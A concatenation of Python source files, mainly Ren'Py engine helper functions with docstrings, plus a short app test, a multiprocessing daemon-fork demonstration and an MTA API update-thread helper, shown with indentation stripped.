def get_reshow_say(**kwargs):
kw = dict(renpy.store._last_say_kwargs)
kw.update(kwargs)
return curried_do_reshow_say(
renpy.store._last_say_who,
renpy.store._last_say_what,
renpy.store._last_say_args,
**kw)
def reshow_say(**kwargs):
get_reshow_say()(**kwargs)
def current_interact_type():
return getattr(renpy.game.context().info, "_current_interact_type", None)
def last_interact_type():
return getattr(renpy.game.context().info, "_last_interact_type", None)
def dynamic(*vars): # @ReservedAssignment
"""
:doc: other
This can be given one or more variable names as arguments. This makes
the variables dynamically scoped to the current call. The variables will
be reset to their original value when the call returns.
An example call is::
$ renpy.dynamic("x", "y", "z")
"""
renpy.game.context().make_dynamic(vars)
def context_dynamic(*vars): # @ReservedAssignment
"""
:doc: other
This can be given one or more variable names as arguments. This makes
the variables dynamically scoped to the current context. The variables will
be reset to their original value when the call returns.
An example call is::
$ renpy.context_dynamic("x", "y", "z")
"""
renpy.game.context().make_dynamic(vars, context=True)
def seen_label(label):
"""
:doc: label
Returns true if the named label has executed at least once on the current user's
system, and false otherwise. This can be used to unlock scene galleries, for
example.
"""
return label in renpy.game.persistent._seen_ever # @UndefinedVariable
def seen_audio(filename):
"""
:doc: audio
Returns True if the given filename has been played at least once on the current
user's system.
"""
filename = re.sub(r'^<.*?>', '', filename)
return filename in renpy.game.persistent._seen_audio # @UndefinedVariable
def seen_image(name):
"""
:doc: image_func
Returns True if the named image has been seen at least once on the user's
system. An image has been seen if it's been displayed using the show statement,
scene statement, or :func:`renpy.show` function. (Note that there are cases
where the user won't actually see the image, like a show immediately followed by
a hide.)
"""
if not isinstance(name, tuple):
name = tuple(name.split())
return name in renpy.game.persistent._seen_images # @UndefinedVariable
def file(fn): # @ReservedAssignment
"""
:doc: file
Returns a read-only file-like object that accesses the file named `fn`. The file is
accessed using Ren'Py's standard search method, and may reside in an RPA archive
or as an Android asset.
The object supports a wide subset of the fields and methods found on Python's
standard file object, opened in binary mode. (Basically, all of the methods that
are sensible for a read-only file.)
"""
return renpy.loader.load(fn)
def notl_file(fn): # @ReservedAssignment
"""
:undocumented:
Like file, but doesn't search the translation prefix.
"""
return renpy.loader.load(fn, tl=False)
@renpy_pure
def image_size(im):
"""
:doc: file_rare
Given an image manipulator, loads it and returns a (``width``,
``height``) tuple giving its size.
This reads the image in from disk and decompresses it, without
using the image cache. This can be slow.
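For example (a sketch; ``logo.png`` is a hypothetical file in the game directory)::
$ width, height = renpy.image_size("logo.png")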
"""
# Index the archives, if we haven't already.
renpy.loader.index_archives()
im = renpy.easy.displayable(im)
if not isinstance(im, renpy.display.im.Image):
raise Exception("renpy.image_size expects it's argument to be an image.")
surf = im.load()
return surf.get_size()
def get_at_list(name, layer=None):
"""
:doc: se_images
Returns the list of transforms being applied to the image with tag `name`
on `layer`. Returns an empty list if no transforms are being applied, or
None if the image is not shown.
If `layer` is None, uses the default layer for the given tag.
"""
if isinstance(name, basestring):
name = tuple(name.split())
tag = name[0]
layer = default_layer(layer, tag)
return renpy.game.context().scene_lists.at_list[layer].get(tag, None)
def show_layer_at(at_list, layer='master', reset=True):
"""
:doc: se_images
:name: renpy.show_layer_at
The Python equivalent of the ``show layer`` `layer` ``at`` `at_list`
statement.
`reset`
If true, the transform state is reset to the start when it is shown.
If false, the transform state is persisted, allowing the new transform
to update that state.
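For example (a sketch; ``my_transform`` is a hypothetical transform), the equivalent of ``show layer master at my_transform``::
$ renpy.show_layer_at([ my_transform ], layer="master")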
"""
if not isinstance(at_list, list):
at_list = [ at_list ]
renpy.game.context().scene_lists.set_layer_at_list(layer, at_list, reset=reset)
layer_at_list = show_layer_at
def free_memory():
"""
:doc: other
Attempts to free some memory. Useful before running a renpygame-based
minigame.
"""
force_full_redraw()
renpy.display.interface.kill_textures_and_surfaces()
renpy.text.font.free_memory()
@renpy_pure
def easy_displayable(d, none=False):
"""
:undocumented:
"""
if none:
return renpy.easy.displayable(d)
else:
return renpy.easy.displayable_or_none(d)
def quit_event():
"""
:doc: other
Triggers a quit event, as if the player clicked the quit button in the
window chrome.
"""
renpy.game.interface.quit_event()
def iconify():
"""
:doc: other
Iconifies the game.
"""
renpy.game.interface.iconify()
# New context stuff.
call_in_new_context = renpy.game.call_in_new_context
curried_call_in_new_context = renpy.curry.curry(renpy.game.call_in_new_context)
invoke_in_new_context = renpy.game.invoke_in_new_context
curried_invoke_in_new_context = renpy.curry.curry(renpy.game.invoke_in_new_context)
call_replay = renpy.game.call_replay
renpy_pure("curried_call_in_new_context")
renpy_pure("curried_invoke_in_new_context")
# Error handling stuff.
def _error(msg):
raise Exception(msg)
_error_handlers = [ _error ]
def push_error_handler(eh):
_error_handlers.append(eh)
def pop_error_handler():
_error_handlers.pop()
def error(msg):
"""
:doc: lint
Reports `msg`, a string, as an error for the user. This is logged as a
parse or lint error when appropriate, and otherwise it is raised as an
exception.
"""
_error_handlers[-1](msg)
def timeout(seconds):
"""
:doc: udd_utility
Causes an event to be generated before `seconds` seconds have elapsed.
This ensures that the event method of a user-defined displayable will be
called.
"""
renpy.game.interface.timeout(seconds)
def end_interaction(value):
"""
:doc: udd_utility
If `value` is not None, immediately ends the current interaction, causing
the interaction to return `value`. If `value` is None, does nothing.
This can be called from inside the render and event methods of a
creator-defined displayable.
"""
if value is None:
return
raise renpy.display.core.EndInteraction(value)
def scry():
"""
:doc: other
Returns the scry object for the current statement.
The scry object tells Ren'Py about things that must be true in the
future of the current statement. Right now, the scry object has one
field:
``nvl_clear``
Is true if an ``nvl clear`` statement will execute before the
next interaction.
"""
name = renpy.game.context().current
node = renpy.game.script.lookup(name)
return node.scry()
@renpy_pure
def munged_filename():
return renpy.parser.munge_filename(get_filename_line()[0])
# Module loading stuff.
loaded_modules = set()
def load_module(name, **kwargs):
"""
:doc: other
This loads the Ren'Py module named `name`. A Ren'Py module consists of Ren'Py script
that is loaded into the usual (store) namespace, contained in a file named
name.rpym or name.rpymc. If a .rpym file exists, and is newer than the
corresponding .rpymc file, it is loaded and a new .rpymc file is created.
All of the init blocks (and other init-phase code) in the module are run
before this function returns. An error is raised if the module name cannot
be found, or is ambiguous.
Module loading may only occur from inside an init block.
"""
if not renpy.game.context().init_phase:
raise Exception("Module loading is only allowed in init code.")
if name in loaded_modules:
return
loaded_modules.add(name)
old_locked = renpy.config.locked
renpy.config.locked = False
initcode = renpy.game.script.load_module(name)
context = renpy.execution.Context(False)
context.init_phase = True
renpy.game.contexts.append(context)
context.make_dynamic(kwargs)
renpy.store.__dict__.update(kwargs) # @UndefinedVariable
for prio, node in initcode: # @UnusedVariable
if isinstance(node, renpy.ast.Node):
renpy.game.context().run(node)
else:
node()
context.pop_all_dynamic()
renpy.game.contexts.pop()
renpy.config.locked = old_locked
def load_string(s, filename="<string>"):
"""
:doc: other
Loads `s` as Ren'Py script that can be called.
Returns the name of the first statement in s.
`filename` is the name of the file that statements in the string will
appear to be from.
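For example, a minimal sketch::
$ first = renpy.load_string("'Hello, world.'\nreturn")
$ renpy.call(first)  # passing the opaque name to renpy.call is an assumption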
"""
old_exception_info = renpy.game.exception_info
try:
old_locked = renpy.config.locked
renpy.config.locked = False
stmts, initcode = renpy.game.script.load_string(filename, unicode(s))
if stmts is None:
return None
context = renpy.execution.Context(False)
context.init_phase = True
renpy.game.contexts.append(context)
for prio, node in initcode: # @UnusedVariable
if isinstance(node, renpy.ast.Node):
renpy.game.context().run(node)
else:
node()
context.pop_all_dynamic()
renpy.game.contexts.pop()
renpy.config.locked = old_locked
renpy.game.script.analyze()
return stmts[0].name
finally:
renpy.game.exception_info = old_exception_info
def pop_call():
"""
:doc: other
:name: renpy.pop_call
Pops the current call from the call stack, without returning to
the location.
This can be used if a label that is called decides not to return
to its caller.
"""
renpy.game.context().pop_call()
pop_return = pop_call
def call_stack_depth():
"""
:doc: other
Returns the depth of the call stack of the current context - the number
of calls that have run without being returned from or popped from the
call stack.
"""
return len(renpy.game.context().return_stack)
def game_menu(screen=None):
"""
:undocumented: Probably not what we want in the presence of
screens.
"""
if screen is None:
call_in_new_context("_game_menu")
else:
call_in_new_context("_game_menu", _game_menu_screen=screen)
def shown_window():
"""
:doc: other
Call this to indicate that the window has been shown. This interacts
with the "window show" statement, which shows an empty window whenever
this function has not been called during an interaction.
"""
renpy.game.context().scene_lists.shown_window = True
class placement(renpy.python.RevertableObject):
def __init__(self, p):
super(placement, self).__init__()
self.xpos = p[0]
self.ypos = p[1]
self.xanchor = p[2]
self.yanchor = p[3]
self.xoffset = p[4]
self.yoffset = p[5]
self.subpixel = p[6]
@property
def pos(self):
return self.xpos, self.ypos
@property
def anchor(self):
return self.xanchor, self.yanchor
@property
def offset(self):
return self.xoffset, self.yoffset
def get_placement(d):
"""
:doc: image_func
This gets the placement of displayable d. There's very little warranty on this
information, as it might change when the displayable is rendered, and might not
exist until the displayable is first rendered.
This returns an object with the following fields, each corresponding to a style
property:
* pos
* xpos
* ypos
* anchor
* xanchor
* yanchor
* offset
* xoffset
* yoffset
* subpixel
"""
p = d.get_placement()
return placement(p)
def get_image_bounds(tag, width=None, height=None, layer='master'):
"""
:doc: image_func
If an image with `tag` exists on `layer`, returns the bounding box of
that image. Returns None if the image is not found.
The bounding box is an (x, y, width, height) tuple. The components of
the tuples are expressed in pixels, and may be floating point numbers.
`width`, `height`
The width and height of the area that contains the image. If None,
defaults to the width and height of the screen, respectively.
`layer`
If None, uses the default layer for `tag`.
"""
tag = tag.split()[0]
layer = default_layer(layer, tag)
if width is None:
width = renpy.config.screen_width
if height is None:
height = renpy.config.screen_height
return scene_lists().get_image_bounds(layer, tag, width, height)
# User-Defined Displayable stuff.
Render = renpy.display.render.Render
render = renpy.display.render.render
IgnoreEvent = renpy.display.core.IgnoreEvent
redraw = renpy.display.render.redraw
class Displayable(renpy.display.core.Displayable, renpy.python.RevertableObject):
pass
class Container(renpy.display.core.Displayable, renpy.python.RevertableObject):
_list_type = renpy.python.RevertableList
def get_roll_forward():
return renpy.game.interface.shown_window
def cache_pin(*args):
"""
:undocumented: Cache pin is deprecated.
"""
new_pins = renpy.python.RevertableSet()
for i in args:
im = renpy.easy.displayable(i)
if not isinstance(im, renpy.display.im.ImageBase):
raise Exception("Cannot pin non-image-manipulator %r" % im)
new_pins.add(im)
renpy.store._cache_pin_set = new_pins | renpy.store._cache_pin_set
def cache_unpin(*args):
"""
:undocumented: Cache pin is deprecated.
"""
new_pins = renpy.python.RevertableSet()
for i in args:
im = renpy.easy.displayable(i)
if not isinstance(im, renpy.display.im.ImageBase):
raise Exception("Cannot unpin non-image-manipulator %r" % im)
new_pins.add(im)
renpy.store._cache_pin_set = renpy.store._cache_pin_set - new_pins
def expand_predict(d):
"""
:undocumented:
Use the fnmatch function to expand `d` for the purposes of prediction.
"""
if not isinstance(d, basestring):
return [ d ]
if not "*" in d:
return [ d ]
if "." in d:
l = list_files(False)
else:
l = list_images()
return fnmatch.filter(l, d)
def start_predict(*args):
"""
:doc: image_func
This function takes one or more displayables as arguments. It causes
Ren'Py to predict those displayables during every interaction until
the displayables are removed by :func:`renpy.stop_predict`.
If a displayable name is a string containing one or more \\*
characters, the asterisks are used as a wildcard pattern. If there
is at least one . in the string, the pattern is matched against
filenames, otherwise it is matched against image names.
For example::
$ renpy.start_predict("eileen *")
starts predicting all images with the name eileen, while::
$ renpy.start_predict("images/concert*.*")
matches all files starting with concert in the images directory.
"""
new_predict = renpy.python.RevertableSet(renpy.store._predict_set)
for i in args:
for d in expand_predict(i):
d = renpy.easy.displayable(d)
new_predict.add(d)
renpy.store._predict_set = new_predict
def stop_predict(*args):
"""
:doc: image_func
This function takes one or more displayables as arguments. It causes
Ren'Py to stop predicting those displayables during every interaction.
Wildcard patterns can be used as described in :func:`renpy.start_predict`.
"""
new_predict = renpy.python.RevertableSet(renpy.store._predict_set)
for i in args:
for d in expand_predict(i):
d = renpy.easy.displayable(d)
new_predict.discard(d)
renpy.store._predict_set = new_predict
def start_predict_screen(_screen_name, *args, **kwargs):
"""
:doc: screens
Causes Ren'Py to start predicting that the screen named `_screen_name`
will be shown with the given arguments. This replaces any previous prediction
of `_screen_name`. To stop predicting a screen, call :func:`renpy.stop_predict_screen`.
"""
new_predict = renpy.python.RevertableDict(renpy.store._predict_screen)
new_predict[_screen_name] = (args, kwargs)
renpy.store._predict_screen = new_predict
def stop_predict_screen(name):
"""
:doc: screens
Causes Ren'Py to stop predicting that the screen named `name` will be shown.
"""
new_predict = renpy.python.RevertableDict(renpy.store._predict_screen)
new_predict.pop(name, None)
renpy.store._predict_screen = new_predict
def call_screen(_screen_name, *args, **kwargs):
"""
:doc: screens
The programmatic equivalent of the call screen statement.
This shows `_screen_name` as a screen, then causes an interaction
to occur. The screen is hidden at the end of the interaction, and
the result of the interaction is returned.
Keyword arguments not beginning with _ are passed to the scope of
the screen.
If the keyword argument `_with_none` is false, "with None" is not
run at the end of the interaction.
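For example (a sketch; ``confirm`` is a hypothetical screen that returns a value)::
$ answer = renpy.call_screen("confirm", message="Are you sure?")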
"""
renpy.exports.mode('screen')
with_none = renpy.config.implicit_with_none
if "_with_none" in kwargs:
with_none = kwargs.pop("_with_none")
show_screen(_screen_name, _transient=True, *args, **kwargs)
roll_forward = renpy.exports.roll_forward_info()
try:
rv = renpy.ui.interact(mouse="screen", type="screen", roll_forward=roll_forward)
except (renpy.game.JumpException, renpy.game.CallException) as e:
rv = e
renpy.exports.checkpoint(rv)
if with_none:
renpy.game.interface.do_with(None, None)
if isinstance(rv, (renpy.game.JumpException, renpy.game.CallException)):
raise rv
return rv
@renpy_pure
def list_files(common=False):
"""
:doc: file
Lists the files in the game directory and archive files. Returns
a list of files, with / as the directory separator.
`common`
If true, files in the common directory are included in the
listing.
"""
rv = [ ]
for dir, fn in renpy.loader.listdirfiles(common): # @ReservedAssignment
if fn.startswith("saves/"):
continue
rv.append(fn)
rv.sort()
return rv
def get_renderer_info():
"""
:doc: other
Returns a dictionary, giving information about the renderer Ren'Py is
currently using. The dictionary has one required key:
``"renderer"``
One of ``"gl"`` or ``"sw"``, corresponding to the OpenGL and
software renderers, respectively.
``"resizable"``
True if and only if the window is resizable.
``"additive"``
True if and only if the renderer supports additive blending.
Other, renderer-specific, keys may also exist. The dictionary should
be treated as immutable. This should only be called once the display
has been started (that is, after the init phase has finished).
"""
return renpy.display.draw.info
def display_reset():
"""
:undocumented: Used internally.
Causes the display to be restarted at the start of the next interaction.
"""
renpy.display.interface.display_reset = True
def mode(mode):
"""
:doc: modes
Causes Ren'Py to enter the named mode, or stay in that mode if it's
already in it.
"""
ctx = renpy.game.context()
if not ctx.use_modes:
return
modes = ctx.modes
try:
ctx.use_modes = False
if mode != modes[0]:
for c in renpy.config.mode_callbacks:
c(mode, modes)
finally:
ctx.use_modes = True
if mode in modes:
modes.remove(mode)
modes.insert(0, mode)
def get_mode():
"""
:doc: modes
Returns the current mode, or None if it is not defined.
"""
ctx = renpy.game.context()
if not ctx.use_modes:
return None
modes = ctx.modes
return modes[0]
def notify(message):
"""
:doc: other
Causes Ren'Py to display the `message` using the notify screen. By
default, this will cause the message to be dissolved in, displayed
for two seconds, and dissolved out again.
This is useful for actions that otherwise wouldn't produce feedback,
like screenshots or quicksaves.
Only one notification is displayed at a time. If a second notification
is displayed, the first notification is replaced.
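For example::
$ renpy.notify("Game saved.")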
"""
hide_screen('notify')
show_screen('notify', message=message)
restart_interaction()
@renpy_pure
def variant(name):
"""
:doc: screens
Returns true if `name` is a screen variant that can be chosen
by Ren'Py. See :ref:`screen-variants` for more details. This function
can be used as the condition in a Python if statement to set up the
appropriate styles for the selected screen variant.
`name` can also be a list of variants, in which case this function
returns True if any of the variants is selected.
"""
if isinstance(name, basestring):
return name in renpy.config.variants
else:
for n in name:
if n in renpy.config.variants:
return True
return False
def vibrate(duration):
"""
:doc: other
Causes the device to vibrate for `duration` seconds. Currently, this
is only supported on Android.
"""
try:
import android # @UnresolvedImport
android.vibrate(duration)
except:
pass
def get_say_attributes():
"""
:doc: other
Gets the attributes associated with the current say statement, or
None if no attributes are associated with this statement.
This is only valid when executing or predicting a say statement.
"""
return renpy.game.context().say_attributes
def get_side_image(prefix_tag, image_tag=None, not_showing=True, layer=None):
"""
:doc: other
This attempts to find an image to show as the side image.
It begins by determining a set of image attributes. If `image_tag` is
given, it gets the image attributes from the tag. Otherwise, it gets
them from the currently showing character.
It then looks up an image with the tag `prefix_tag` and those attributes,
and returns it if it exists.
If `not_showing` is True, this only returns a side image if the image the
attributes are taken from is not on the screen.
If `layer` is None, uses the default layer for the currently showing
tag.
"""
images = renpy.game.context().images
if image_tag is not None:
image_layer = default_layer(layer, image_tag)
attrs = (image_tag,) + images.get_attributes(image_layer, image_tag)
else:
attrs = renpy.store._side_image_attributes
if not attrs:
return None
attr_layer = default_layer(layer, attrs)
if not_showing and images.showing(attr_layer, (attrs[0], )):
return None
required = set()
optional = set(attrs)
return images.choose_image(prefix_tag, required, optional, None)
def get_physical_size():
"""
:doc: other
Returns the size of the physical window.
"""
return renpy.display.draw.get_physical_size()
def set_physical_size(size):
"""
:doc: other
Attempts to set the size of the physical window to `size`. This has the
side effect of taking the screen out of fullscreen mode.
"""
renpy.game.preferences.fullscreen = False
if get_renderer_info()["resizable"]:
renpy.display.interface.set_mode(size)
renpy.display.interface.last_resize = size
def reset_physical_size():
"""
:doc: other
Attempts to set the size of the physical window to the specified values
in renpy.config. (That is, screen_width and screen_height.) This has the
side effect of taking the screen out of fullscreen mode.
"""
renpy.game.preferences.fullscreen = False
if get_renderer_info()["resizable"]:
renpy.display.interface.set_mode((renpy.config.screen_width, renpy.config.screen_height))
@renpy_pure
def fsencode(s):
"""
:doc: file_rare
:name: renpy.fsencode
Converts s from unicode to the filesystem encoding.
"""
if not isinstance(s, unicode):
return s
fsencoding = sys.getfilesystemencoding() or "utf-8"
return s.encode(fsencoding, "replace")
@renpy_pure
def fsdecode(s):
"""
:doc: file_rare
:name: renpy.fsdecode
Converts s from filesystem encoding to unicode.
"""
if not isinstance(s, str):
return s
fsencoding = sys.getfilesystemencoding() or "utf-8"
return s.decode(fsencoding)
from renpy.editor import launch_editor # @UnusedImport
def get_image_load_log(age=None):
"""
:doc: other
A generator that yields a log of image loading activity. For each of the
last 100 image loads, this yields:
* The time the image was loaded (in seconds since the epoch).
* The filename of the image that was loaded.
* A boolean that is true if the image was preloaded, and false if the
game stalled to load it.
The entries are ordered from newest to oldest.
`age`
If not None, only images that have been loaded in the past `age`
seconds are included.
The image load log is only kept if config.developer = True.
"""
if age is not None:
deadline = time.time() - age
else:
deadline = 0
for i in renpy.display.im.cache.load_log:
if i[0] < deadline:
break
yield i
def end_replay():
"""
:doc: replay
If we're in a replay, ends the replay immediately. Otherwise, does
nothing.
"""
if renpy.store._in_replay:
raise renpy.game.EndReplay()
def save_persistent():
"""
:doc: persistent
Saves the persistent data to disk.
"""
renpy.persistent.update(True)
def is_seen(ever=True):
"""
:doc: other
Returns true if the current line has been seen by the player.
If `ever` is true, we check to see if the line has ever been seen by the
player. If false, we check if the line has been seen in the current
play-through.
"""
return renpy.game.context().seen_current(ever)
def get_mouse_pos():
"""
:doc: other
Returns an (x, y) tuple giving the location of the mouse pointer or the
current touch location. If the device does not support a mouse and is not
currently being touched, x and y are numbers, but not meaningful.
"""
return renpy.display.draw.get_mouse_pos()
def set_mouse_pos(x, y, duration=0):
"""
:doc: other
Jump the mouse pointer to the location given by arguments x and y.
If the device does not have a mouse pointer, this does nothing.
`duration`
The time it will take to perform the move, in seconds.
During this time, the mouse may be unresponsive.
"""
renpy.display.interface.set_mouse_pos(x, y, duration)
def set_autoreload(autoreload):
"""
:doc: other
Sets the autoreload flag, which determines if the game will be
automatically reloaded after file changes. Autoreload will not be
fully enabled until the game is reloaded with :func:`renpy.utter_restart`.
"""
renpy.autoreload = autoreload
def get_autoreload():
"""
:doc: other
Gets the autoreload flag.
"""
return renpy.autoreload
def count_dialogue_blocks():
"""
:doc: other
Returns the number of dialogue blocks in the game's original language.
"""
return renpy.game.script.translator.count_translates()
def count_seen_dialogue_blocks():
"""
:doc: other
Returns the number of dialogue blocks the user has seen in any play-through
of the current game.
"""
return renpy.game.seen_translates_count
def count_newly_seen_dialogue_blocks():
"""
:doc: other
Returns the number of dialogue blocks the user has seen for the first time
during this session.
"""
return renpy.game.new_translates_count
def substitute(s, scope=None, translate=True):
"""
:doc: other
Applies translation and new-style formatting to the string `s`.
`scope`
If not None, a scope which is used in formatting, in addition to the
default store.
`translate`
Determines if translation occurs.
Returns the translated and formatted string.
"""
return renpy.substitutions.substitute(s, scope=scope, translate=translate)[0]
def munge(name, filename=None):
"""
:doc: other
Munges `name`, which must begin with __.
`filename`
The filename the name is munged into. If None, the name is munged
into the filename containing the call to this function.
"""
if filename is None:
filename = sys._getframe(1).f_code.co_filename
if not name.startswith("__"):
return name
if name.endswith("__"):
return name
return renpy.parser.munge_filename(filename) + name[2:]
def get_return_stack():
"""
:doc: label
Returns a list giving the current return stack. The return stack is a
list of statement names.
The statement names will be strings (for labels), or opaque tuples (for
non-label statements).
"""
return renpy.game.context().get_return_stack()
def set_return_stack(stack):
"""
:doc: label
Sets the current return stack. The return stack is a list of statement
names.
Statement names may be strings (for labels) or opaque tuples (for
non-label statements).
"""
renpy.game.context().set_return_stack(stack)
def invoke_in_thread(fn, *args, **kwargs):
"""
:doc: other
Invokes the function `fn` in a background thread, passing it the
provided arguments and keyword arguments. Restarts the interaction
once the thread returns.
This function creates a daemon thread, which will be automatically
stopped when Ren'Py is shutting down.
"""
def run():
try:
fn(*args, **kwargs)
except:
import traceback
traceback.print_exc()
restart_interaction()
t = threading.Thread(target=run)
t.daemon = True
t.start()
def cancel_gesture():
"""
:doc: gesture
Cancels the current gesture, preventing the gesture from being recognized.
This should be called by displayables that have gesture-like behavior.
"""
renpy.display.gesture.recognizer.cancel() # @UndefinedVariable
def execute_default_statement(start=False):
"""
:undocumented:
Executes the default statement.
"""
for i in renpy.ast.default_statements:
i.set_default(start)
def write_log(s, *args):
"""
:undocumented:
Writes to log.txt.
"""
renpy.display.log.write(s, *args)
def predicting():
"""
:doc: screens
Returns true if Ren'Py is currently predicting the screen.
"""
return renpy.display.predict.predicting
def get_line_log():
"""
:undocumented:
Returns the list of lines that have been shown since the last time
:func:`renpy.clear_line_log` was called.
"""
return renpy.game.context().line_log[:]
def clear_line_log():
"""
:undocumented:
Clears the line log.
"""
renpy.game.context().line_log = [ ]
def add_layer(layer, above=None, below=None, menu_clear=True):
"""
:doc: other
Adds a new layer to the screen. If the layer already exists, this
function does nothing.
    One of `above` or `below` must be given.
`layer`
A string giving the name of the new layer to add.
`above`
If not None, a string giving the name of a layer the new layer will
be placed above.
`below`
If not None, a string giving the name of a layer the new layer will
be placed below.
`menu_clear`
If true, this layer will be cleared when entering the game menu
        context, and restored when leaving it.
"""
layers = renpy.config.layers
if layer in renpy.config.layers:
return
if (above is not None) and (below is not None):
raise Exception("The above and below arguments to renpy.add_layer are mutually exclusive.")
elif above is not None:
try:
index = layers.index(above) + 1
except ValueError:
raise Exception("Layer '%s' does not exist." % above)
elif below is not None:
try:
index = layers.index(below)
except ValueError:
raise Exception("Layer '%s' does not exist." % below)
else:
raise Exception("The renpy.add_layer function requires either the above or below argument.")
layers.insert(index, layer)
if menu_clear:
renpy.config.menu_clear_layers.append(layer) # @UndefinedVariable
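# e.g. renpy.add_layer("subtitles", above="master")  # "subtitles" is a
# hypothetical layer name; "master" is one of Ren'Py's standard layers.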
def maximum_framerate(t):
"""
:doc: other
Forces Ren'Py to draw the screen at the maximum framerate for `t` seconds.
If `t` is None, cancels the maximum framerate request.
"""
if renpy.display.interface is not None:
renpy.display.interface.maximum_framerate(t)
else:
if t is None:
renpy.display.core.initial_maximum_framerate = 0
else:
renpy.display.core.initial_maximum_framerate = max(renpy.display.core.initial_maximum_framerate, t)
def is_start_interact():
"""
:doc: other
Returns true if restart_interaction has not been called during the current
interaction. This can be used to determine if the interaction is just being
started, or has been restarted.
"""
return renpy.display.interface.start_interact
def play(filename, channel=None, **kwargs):
"""
:doc: audio
Plays a sound effect. If `channel` is None, it defaults to
:var:`config.play_channel`. This is used to play sounds defined in
styles, :propref:`hover_sound` and :propref:`activate_sound`.
"""
if filename is None:
return
if channel is None:
channel = renpy.config.play_channel
renpy.audio.music.play(filename, channel=channel, loop=False, **kwargs)
def get_editable_input_value():
"""
:undocumented:
    Returns the current input value, and a flag that is true if it is
    editable and false otherwise.
"""
return renpy.display.behavior.current_input_value, renpy.display.behavior.input_value_active
def set_editable_input_value(input_value, editable):
"""
:undocumented:
Sets the currently active input value, and if it should be marked as
editable.
"""
renpy.display.behavior.current_input_value = input_value
renpy.display.behavior.input_value_active = editable
def get_refresh_rate(precision=5):
"""
:doc: other
Returns the refresh rate of the current screen, as a floating-point
number of frames per second.
`precision`
        The raw data Ren'Py gets is the number of frames per second, rounded down.
This means that a monitor that runs at 59.95 frames per second will
be reported at 59 fps. The precision argument reduces the precision
of this reading, such that the only valid readings are multiples of
the precision.
Since all monitor framerates tend to be multiples of 5 (25, 30, 60,
75, and 120), this likely will improve accuracy. Setting precision
to 1 disables this.
"""
precision *= 1.0
info = renpy.display.get_info()
rv = info.refresh_rate
rv = round(rv / precision) * precision
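    # Worked example: a raw reading of 59 fps with the default precision of 5
    # becomes round(59 / 5.0) * 5.0 == 60.0, matching a 60 Hz display.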
return rv
def get_identifier_checkpoints(identifier):
"""
:doc: rollback
Given a rollback_identifier from a HistoryEntry object, returns the number
of checkpoints that need to be passed to :func:`renpy.rollback` to reach
    that identifier. Returns None if the identifier is not in the rollback
history.
"""
return renpy.game.log.get_identifier_checkpoints(identifier)
def get_adjustment(bar_value):
"""
:doc: other
Given `bar_value`, a :class:`BarValue`, returns the :func:`ui.adjustment`
    it uses. The adjustment has the following two attributes defined:
.. attribute:: value
The current value of the bar.
.. attribute:: range
The current range of the bar.
"""
return bar_value.get_adjustment()
def get_skipping():
"""
:doc: other
    Returns true if Ren'Py is skipping, "fast" if Ren'Py is fast skipping,
and false if it is not skipping.
"""
return renpy.config.skipping
def get_texture_size():
"""
:undocumented:
Returns the number of bytes of memory locked up in OpenGL textures and the
number of textures that are defined.
"""
return renpy.display.draw.get_texture_size()
old_battery = False
def get_on_battery():
"""
    :doc: other
Returns True if Ren'Py is running on a device that is powered by an internal
battery, or False if the device is being charged by some external source.
"""
global old_battery
pi = pygame_sdl2.power.get_power_info() # @UndefinedVariable
if pi.state == pygame_sdl2.POWERSTATE_UNKNOWN: # @UndefinedVariable
return old_battery
elif pi.state == pygame_sdl2.POWERSTATE_ON_BATTERY: # @UndefinedVariable
old_battery = True
return True
else:
old_battery = False
return False
def get_say_image_tag():
"""
:doc: image_func
Returns the tag corresponding to the currently speaking character (the
`image` argument given to that character). Returns None if no character
is speaking or the current speaking character does not have a corresponding
image tag.
"""
if renpy.store._side_image_attributes is None:
return None
return renpy.store._side_image_attributes[0]
def is_skipping():
"""
:doc: other
Returns True if Ren'Py is currently skipping (in fast or slow skip mode),
or False otherwise.
"""
return not not renpy.config.skipping
|
test_app.py
|
from tixte_foss import app
from multiprocessing import Process
import pytest
def test_run():
server = Process(target=app.run)
server.start()
    server.terminate()
    server.join()  # reap the child so the test exits cleanly
|
daemon_processes_cant_fork.py
|
#!/usr/bin/env python
# Daemon processes can't fork child processes in Python, because...
# Well, they just can't. We want to use daemons though to avoid hanging
# processes if, for some reason, communication of termination conditions
# fails.
#
# Patchy McPatchface to the rescue (no, I am not kidding): we remove
# that useless assert (of all things!) on the fly.
#
# NOTE: while this works, we seem to have the socketpair-based detection
# stable enough to not need the monkeypatch.
#
#
# _daemon_fork_patch = '''\
# *** process_orig.py Sun Nov 20 20:02:23 2016
# --- process_fixed.py Sun Nov 20 20:03:33 2016
# ***************
# *** 5,12 ****
# assert self._popen is None, 'cannot start a process twice'
# assert self._parent_pid == os.getpid(), \\
# 'can only start a process object created by current process'
# - assert not _current_process._daemonic, \\
# - 'daemonic processes are not allowed to have children'
# _cleanup()
# if self._Popen is not None:
# Popen = self._Popen
# --- 5,10 ----
# '''
#
# import patchy
# patchy.mc_patchface(mp.Process.start, _daemon_fork_patch)
import os
import sys
import time
import multiprocessing as mp
def work_2():
    print('foo')
def work_1():
proc = mp.Process(target=work_2)
proc.start()
proc.join()
def test():
child = mp.Process(target=work_1)
child.daemon = True
# NOTE: we expect this to work out of the box.
# It does not.
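    # In practice the nested start() inside the daemonized child dies with
    # "AssertionError: daemonic processes are not allowed to have children" --
    # the very assert the commented-out patch above removes.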
child.start()
child.join()
if __name__ == '__main__':
test()
|
_mtapithreader.py
|
import threading, time, datetime, logging
logger = logging.getLogger(__name__)
class _MtapiThreader(object):
LOCK_TIMEOUT = 300
update_lock = threading.Lock()
update_lock_time = datetime.datetime.now()
def __init__(self, mtapi, expires_seconds=60):
self.mtapi = mtapi
self.EXPIRES_SECONDS = expires_seconds
def start_timer(self):
'''Start a long-lived thread to loop infinitely and trigger updates at
some regular interval.'''
logger.info('Starting update thread...')
self.timer_thread = threading.Thread(target=self.update_timer)
self.timer_thread.daemon = True
self.timer_thread.start()
def update_timer(self):
'''This method runs in its own thread. Run feed updates in short-lived
threads.'''
while True:
time.sleep(self.EXPIRES_SECONDS)
self.update_thread = threading.Thread(target=self.locked_update)
self.update_thread.start()
def locked_update(self):
if not self.update_lock.acquire(False):
logger.info('Update locked!')
lock_age = datetime.datetime.now() - self.update_lock_time
if lock_age.total_seconds() < self.LOCK_TIMEOUT:
return
else:
self.update_lock = threading.Lock()
                logger.warning('Cleared expired update lock')
self.update_lock_time = datetime.datetime.now()
self.mtapi._update()
self.update_lock.release()
def restart_if_dead(self):
if not self.timer_thread.is_alive():
            logger.warning('Timer died')
self.start_timer()
return True
return False
